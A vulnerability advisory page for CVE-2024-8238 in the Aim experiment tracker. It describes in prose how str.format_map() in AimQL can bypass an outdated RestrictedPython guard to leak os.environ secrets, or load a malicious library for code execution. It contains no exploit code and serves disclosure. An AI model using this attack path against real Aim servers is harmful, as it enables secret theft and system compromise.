VYPR
← All advisories
Moderate severityNVD Advisory· Published Mar 20, 2025· Updated Oct 15, 2025

Unrestricted Code Execution in aimhubio/aim

CVE-2024-8238

Description

In version 3.22.0 of aimhubio/aim, the AimQL query language uses an outdated version of the safer_getattr() function from RestrictedPython. This version does not protect against the str.format_map() method, allowing an attacker to leak server-side secrets or potentially gain unrestricted code execution. The vulnerability arises because str.format_map() can read arbitrary attributes of Python objects, enabling attackers to access sensitive variables such as os.environ. If an attacker can write files to a known location on the Aim server, they can use str.format_map() to load a malicious .dll/.so file into the Python interpreter, leading to unrestricted code execution.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Aim 3.22.0's AimQL uses outdated RestrictedPython, allowing str.format_map() to leak secrets or achieve RCE via malicious DLL/SO loading.

Vulnerability

Overview

CVE-2024-8238 affects aimhubio/aim version 3.22.0. The AimQL query language relies on an outdated version of the safer_getattr() function from RestrictedPython, which does not block the str.format_map() method [2]. This enables an attacker to read arbitrary attributes of Python objects, such as os.environ, leaking server-side secrets.

Exploitation

Details

To exploit the leak, an attacker only needs to send a crafted AimQL query using str.format_map() to access sensitive attributes. For full remote code execution, the attacker must also have the ability to write files to a known location on the Aim server [4]. With this access, they can use str.format_map() to load a malicious dynamic library (.dll on Windows or .so on Linux) into the Python interpreter, achieving unrestricted code execution.

Impact

The primary impact is information disclosure of sensitive environment variables. In scenarios where the attacker can write files to the server, the vulnerability escalates to arbitrary code execution, potentially compromising the entire system.

Mitigation

The vulnerability is present in Aim version 3.22.0. Users should upgrade to a patched version that uses a newer RestrictedPython version that properly blocks str.format_map() [1]. As of the publication date, no official patch has been announced, but the community is advised to monitor the project repository for updates.

References
  1. GitHub - aimhubio/aim: Aim 💫 — An easy-to-use & supercharged open-source experiment tracker.
  2. NVD - CVE-2024-8238
  3. The world’s first bug bounty platform for AI/ML

AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
aimPyPI
>= 3.0.0, <= 3.22.0

Affected products

3
  • Aimhubio/Aimllm-fuzzy
    Range: = 3.22.0
  • ghsa-coords
    pkg:pypi/aim
    Range: >= 3.0.0, <= 3.22.0
  • aimhubio/aimhubio/aimv5
    Range: unspecified

Patches

0

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

4

News mentions

0

No linked articles in our index yet.